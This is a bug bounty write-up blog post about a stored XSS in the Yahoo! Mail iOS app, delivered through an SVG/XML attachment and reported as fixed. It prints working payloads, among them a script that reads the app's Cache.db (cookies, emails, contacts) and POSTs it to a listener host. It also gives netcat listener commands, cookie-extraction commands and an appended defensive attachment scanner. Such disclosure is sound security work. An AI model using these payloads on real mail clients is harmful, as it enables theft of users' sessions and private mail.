WRITE UP – LOVE STORY, FROM CLOSED AS INFORMATIVE TO $3,500 USD, XSS STORED IN YAHOO! IOS MAIL APP

Hi everyone. It’s been a while since my last post, but I’m back. I want to tell you a love story about the Yahoo! bug bounty program. It was a great experience because I learned a lot of lessons, and I got into the Yahoo! Security Hall of Fame (2018) via HackerOne, so here we go:

Report Summary (first try):

Hi Yahoo! team. I’ve found a stored XSS in the Yahoo! Mail iOS app via an XML file.

Description and impact:

An attacker can render arbitrary HTML/JavaScript via a specially crafted XML attachment, in the background, because the code runs every time you open any attachment in the same email in the Yahoo! Mail iOS app in the production environment (and can also perform an exponential entity expansion DoS attack and crash the app).

Steps To Reproduce (Extracted from the h1 report):

1.- Log in to your Yahoo! email account in any client, attach an XML file with the following content and send it via email (yahoo-xss.xml file attached):

<?xml version="1.0" encoding="utf-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>prompt(document.location)</script>
</svg>

2.- Look for the XML file in the iOS app, tap to open it and see the XSS.

Note: I don’t know why, but the XML rendering behaviour in the Yahoo! Mail iOS app is very weird and dangerous: the stored XSS shows up when you tap any email attachment. For example, if you have 5 attachments and you tap any of them, the XSS fires every single time, no matter which attachment you opened.

HackerOne staff response (Closed as informative)

Well, at that moment I needed to find a way to prove that this could be exploitable in a pretty bad way, but nothing came to mind, so I just kept going with my life.

Resend the report (second try):

One day I thought about that report on h1, the Yahoo! XSS closed as informative, and I got an idea that helped me escalate that harmless XSS into something bigger: what if I could make an HTTP request like GET to local app resources? BINGO. That’s how I was able to get the full cache database of the Yahoo! iOS app, including user cookies, the contact list, email content, etc.

Steps To Reproduce (Extracted from the h1 report):

1.- Log in to your Yahoo! email account in any client, attach an XML file with the following content and send it via email (dump_mails.xml and cachedb_post.xml files attached).

2.- Open the email attachment. Scenario: the attacker sends a PowerPoint presentation, but the XML is attached too, so when the victim opens the PowerPoint file the stored XSS fires. I don’t know why, but for example, if you have 5 attachments and you tap any of them, the XSS shows up every single time no matter which attachment you opened (video attached).

Getting the mail contact list, including senders, receivers and the contact list (dump_mails.xml):
3A.- The XSS shows first navigator.appVersion, then the file location, then the email list (it takes some time, about 30s depending on your internet connection), and when you click OK the email list is sent via GET to any server (screenshot attached); in my case it was my own computer on my LAN, listening with nc -lvvv 8090

Getting the cookies (cache.db file via cachedb_post.xml):
3B.- The XSS shows first navigator.appVersion, then the file location, then an “empty” alert (it takes some time, about 30s depending on your internet connection), but when you click OK the full Cache.db file is sent via POST to any server (screenshot attached); in my case it was my own computer on my LAN, listening with nc -lvvv 8090 > yahoo.db

Then, after dumping the cache.db file, strip the headers and run the query to get the cookies:
strings yahoo.db | grep -i Cookie -A 10 -B 5

Bonus: you can also enumerate the app’s HTTP endpoints to “use” the cookies:
strings yahoo.db | grep -i https

Impact: Any attacker can steal the cookies and the Yahoo! user’s emails (including senders, receivers and contact list, even the email content) via cache.db in the background and send them to any server.

Script transcript:

cachedb_post.xml file:
<?xml version="1.0" encoding="utf-8"?>
<svg onload="alert(document.location);" xmlns="http://www.w3.org/2000/svg">
<script>
alert(navigator.appVersion);
<![CDATA[
// Split the file contents into one match per line, show them and post them out.
function GetMailAddress(mailcontent){
    var content_reg = new RegExp(".+",'g');
    // Note: the first two replace() calls receive string literals, not regexes,
    // so they match nothing and are no-ops; only the two regex replace() calls
    // (collapsing runs of whitespace and blank lines) actually change the text.
    var reg = mailcontent.replace('/\s/g','').replace('/\S/g','').replace(/\s\s+/g,' ').replace(/\n\s*\n/g,'\n').match(content_reg);

    alert(reg);
    send_response(reg)
}

// Read a local file through XHR (the app's WebView allowed GET requests
// to local resources); with tag === true the contents go to GetMailAddress.
function read_file(read_file_path,tag){
    var oReq = new XMLHttpRequest();
    oReq.addEventListener("load", function(){
        if (tag === true){
            GetMailAddress(this.responseText.toString());
        } else {
            alert(this.responseText);
        }
    });

    oReq.open("GET", read_file_path);
    oReq.send();
}

// POST the result to the listener (the author's own machine on the LAN).
function send_response(response){
    var oReqX = new XMLHttpRequest();
    oReqX.open("POST","http://192.168.1.109:8090/");
    oReqX.send(response);
}

// Derive the app's Library path from the attachment's own file:// URL,
// then read the app's Cache.db from it.
var Lib_file_path = location.href.split('Library')[0] + 'Library';
var cache_db = Lib_file_path + '/Caches/com.yahoo.Aerogram/Cache.db';
read_file(cache_db,true);
]]>
</script>
</svg>
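A defender-side check for the attachment pattern this write-up describes, added here as an example (not part of the original post or of the Yahoo! app): it refuses to render an XML/SVG attachment that carries a <script> element or an on* event handler (the two constructs the payloads above rely on), a javascript: href, or a DOCTYPE/ENTITY declaration (the entity expansion DoS vector mentioned in the first report). It uses only the Python standard library; the sample attachments are constructed to mirror the payload shapes on this page.

```python
"""Static check for active content in XML/SVG mail attachments."""
import re
import xml.etree.ElementTree as ET

# Entity/DOCTYPE declarations enable expansion attacks; refuse them up front.
DECL_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed samples shaped like the write-up's payloads plus a benign file.
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="1"/></svg>'
FIRST_TRY = (b'<?xml version="1.0" encoding="utf-8"?>'
             b'<svg xmlns="http://www.w3.org/2000/svg">'
             b'<script>prompt(document.location)</script></svg>')
SECOND_TRY = (b'<svg onload="alert(document.location);" xmlns="http://www.w3.org/2000/svg">'
              b'<script><![CDATA[var x = 1;]]></script></svg>')
ENTITY_DOS = b'<!DOCTYPE x [<!ENTITY a "aaaa">]><svg>&a;</svg>'

def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return name.rsplit("}", 1)[-1].lower()

def scan_xml_attachment(data: bytes) -> list:
    """Return reasons to refuse rendering; an empty list means none found."""
    if DECL_RE.search(data):
        return ["doctype/entity declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return ["malformed xml: %s" % exc]
    findings = []
    for elem in root.iter():
        if not isinstance(elem.tag, str):  # skip comments / processing instructions
            continue
        tag = _local(elem.tag)
        if tag == "script":
            findings.append("script element")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append("event handler %s= on <%s>" % (name, tag))
            if name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: URL on <%s>" % tag)
    return findings

if __name__ == "__main__":
    for label, blob in [("benign", BENIGN), ("first try", FIRST_TRY),
                        ("second try", SECOND_TRY), ("entity dos", ENTITY_DOS)]:
        print(label, scan_xml_attachment(blob) or "clean")
```

A mail client that only opens attachments with an empty result list would have refused both payloads from this report; the check is deliberately conservative and is a reason to block, not a proof that a file is safe.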

HackerOne staff response (Reopened, Triaged, Fixed and a good bounty paid by the Yahoo! team)

Environment:
iPhone 6 – iOS v11.2.5.
Yahoo! Mail app v4.XX.X (XXXXX)
My personal email account; all testing was done by sending emails to myself.

Yahoo! Hall of fame:

https://hackerone.com/yahoo/thanks/2018

Well, that’s it, that is how this love story ends. If you have any thoughts, doubts, comments or suggestions, just drop me a line here or on Twitter @omespino. Read you later.

18 thoughts on “WRITE UP – LOVE STORY, FROM CLOSED AS INFORMATIVE TO $3,500 USD, XSS STORED IN YAHOO! IOS MAIL APP”

    1. In this case it was specific to iOS because the app was rendering XML files and executing the JavaScript code inside the XML; on Android the behaviour wasn’t the same because the Yahoo! Mail Android app doesn’t render those kinds of files, it just downloads them.

    1. After I commented that I got a new exploitation vector, it took about 5 weeks to be reopened, and it was triaged the same day, after a couple of hours.
